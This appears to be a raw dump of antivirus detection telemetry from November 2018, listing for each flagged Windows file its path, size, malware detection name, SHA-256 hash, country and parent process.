  Row(detection=Row(filename='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\204E36F43707C248631F69DF0EF15098FE5BF80B8282E386DB458B4876B96F3B', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:32:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fixattrb.exe', filepath='E:\\UBKT\\FixAttrb.exe', filesize=392000, name='W32/Sality.AT.#M1.#R1'), hash='1fc4b3b4bd83a166b9679841dcb68c6535040d77bc75d5e5f32bd6bf65ce754f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T01:07:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134247-888a5906', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134247-888A5906', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123928-9ff32f6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba9ee249\\AVSCAN-20181102-123840-993AF962\\AVSCAN-20181102-123928-9FF32F6F', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:39:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.950\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.950\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050248-83271855', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050248-83271855', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054208-01d08ceb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054208-01D08CEB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='toshiba.exe', filepath='C:\\Users\\X\\Toshiba\\Toshiba.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100225-bb5b5029', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100026-ACE63AD3\\AVSCAN-20181102-100225-BB5B5029', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160515-26b9abd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160515-26B9ABD3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:08:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4c3c5264f1fcc4edf677f6e9b2e97d6b60c7e315d720f11062392605e1c29fdf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4C3C5264F1FCC4EDF677F6E9B2E97D6B60C7E315D720F11062392605E1C29FDF', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='4c3c5264f1fcc4edf677f6e9b2e97d6b60c7e315d720f11062392605e1c29fdf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053250-b5b88e18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053250-B5B88E18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153509-d7269d94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153509-D7269D94', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_insert_bar_objects_io_06.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_insert_bar_objects_io_06.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='6a2db1ade29fe7e745d7cf030d0bfa768c501fa78c6fd14856670bf02d28256f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-02T07:09:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074054-e68d7848', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec58c2a3\\AVSCAN-20181102-074036-E3E9ED8F\\AVSCAN-20181102-074054-E68D7848', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:40:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053103-75c83738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053103-75C83738', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='peairwsr.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\PeAirWsR.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055644-0be586f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055644-0BE586F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050701-1a76e227', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050701-1A76E227', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:44:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054247-1964d1ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054247-1964D1EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='beachpark.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\beachpark\\beachpark.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060134-b8e5a4ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060134-B8E5A4ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='52d63506e30f7217257625b20bdf6b4b85b6b4ee6b8213c66720b6d153f6df9e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\52D63506E30F7217257625B20BDF6B4B85B6B4EE6B8213C66720B6D153F6DF9E', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='52d63506e30f7217257625b20bdf6b4b85b6b4ee6b8213c66720b6d153f6df9e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:35:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073558-4de6b77d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec0e5d97\\AVSCAN-20181102-073542-4BC778F0\\AVSCAN-20181102-073558-4DE6B77D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:36:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122348-81ff4d4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122348-81FF4D4A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054621-98adf894', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054621-98ADF894', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060403-121f8b58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060403-121F8B58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052133-21da5935', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052133-21DA5935', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055340-9e89c7e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055340-9E89C7E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051650-791a9dba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051650-791A9DBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051003-86a87898', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051003-86A87898', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051443-2d70cfa5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051443-2D70CFA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062543-18c25537', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062543-18C25537', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050428-bec5a00b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050428-BEC5A00B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061139-2177ef2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061139-2177EF2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054031-c827999e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054031-C827999E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061825-13bb6744', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061825-13BB6744', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054508-6d9645ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054508-6D9645AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060837-b4ddce69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060837-B4DDCE69', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:35Z'), dt=datetime.date(2018, 11, 2)),
